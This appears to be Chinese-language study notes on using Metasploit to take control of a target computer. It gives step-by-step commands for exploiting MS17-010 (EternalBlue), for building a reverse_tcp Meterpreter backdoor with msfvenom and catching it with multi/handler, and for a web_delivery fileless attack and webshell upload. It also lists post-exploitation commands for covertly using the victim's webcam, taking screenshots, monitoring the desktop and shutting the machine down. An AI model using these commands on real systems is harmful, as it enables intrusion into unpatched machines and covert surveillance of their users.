msf控制目标电脑
首先安装kali-metasploit
modules-msf核心
- auxiliary:辅助模块,辅助渗透(端口扫描,登陆密码爆破,漏洞验证等等)
- exploits:漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。
- payloads:攻击载荷,主要是攻击后在目标靶机执行的代码。
- post:后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令。
启动
初始化数据库:msfdb init 使用的数据库不是mysql
启动:msfconsoledb_nmap
db_nmap:nmap 扫描
-T[0-5]:默认为T3,T4表示最大TCP扫描延迟为10ms
-sS:TCP SYN扫描
-sA:TCP ACK扫描
-sT:TCP 扫描
-A:全部
hosts:查看当前工作区所有主机,记录在数据库里面。
services:查看所有服务,记录在数据里面。
使用辅助模块
端口扫描:use auxiliary/scanner/postscan/
使用TAB补全,跟也有nmap功能。
永恒之蓝漏洞:445端口(默认开启,无法关闭),window7。
检测ms17_010
search ms17_010
1、使用模块use auxiliary/scanner/smb/smb_ms17_010
2、查看配置
查看设置:show options
3、设置地址set rhosts 地址
4、运行
run或exploit
攻击漏洞-ms17-010
1、使用模块use exploit/windows/smb/ms17_010_eternalblue
同上。
- 出现乱码,修改编码,chcp 65001。
后渗透测试
退出:backgroud
升级:session -u 1常用命令
show exploit-查看所有可用的渗透攻击程序代码
show auxiliary-查看所有可用的辅助攻击工具
show options-查看该模块可用选项
show payloads-查看该模块适用的所有载荷代码
show targets-查看该模块适用的攻击目标类型
search-根据关键字搜索某模块
info-显示某模块的详细信息
use-使用某渗透攻击模块
back-回退
set/unset-设置模/禁用块中的某个参数
setg/unsetg-设置/禁用适用于所有模块的全局参数
save-将当前设置值保存下来,以便下次启动MSF终端时仍可使用。msfvenom
由msfpayload和msfencode组合
用于生成后门的软件,在目标机上执行后门,在本地监听上线。生成后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=地址 lport(未被占用的端口) -f exe>(-o)shell.exe
监听
p为payload f为格式
use exploit/multi/handler - 详解:
msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx lport=xxx -f exe -o xxxx.exe
可帮助我们从大量的msf有效负载中创建需要的负载,合并到利用程序中。
这里使用的payload要回连的主机和端口、输出格式都会整合到xxx.exe中。
exploit/multi/handler模块是一个有效负载处理程序,它只在受损主机中执行的有效负载连接。(类似钓鱼)
meterprter是msf后渗透利用工具。基于内存dll实现,能够通过创建一个新进程并调用注入的dll来让目标系统运行注入dll文件。
在该模式下,攻击者与目标设备中meterpreter的通信是通过stager套接字实现的。*获取到meterpreter后能做什么?
webcam_list:查看摄像头
webcam_snap:快拍
webcam_stream:通过摄像头开启视频
screenshot:获取屏幕截图
screenshare:实现监控桌面
shutdown:关闭目标机器
execute:在目标机执行文件,
execute -iso 重装系统
-H 不可见 -i 交互
拓展:获得shell
使用python,python2 -m SimpleHTTPServer
文件上传
upload /root/AUcONho0.jpeg “C:\aaa.jpeg”
msf攻击漏洞获取目标权限
从命令执行到meterpreter
方法一:通过web站点,使用无文件攻击利用执行。
当攻击者拥有部分受害者主机的控制权,但没拿到一个完整的shell,web_delivery就派上用场。
目的与作用:生成一条命令,与受害者主机快速建立一条session连接,有利于绕过,支持多种脚本,需要设置脚本。
操作:use exploit/multi/script/web_delivery
show options
show targets
set target 数字
set lhost
本机地址set payload windows/meterpreter/reverse_tcp
run
复制命令,到网页提交。
方法二:通过web,上传webshell,到完全控制
百度查大佬发现漏洞。
成功上传webshell,使用msf上线监听。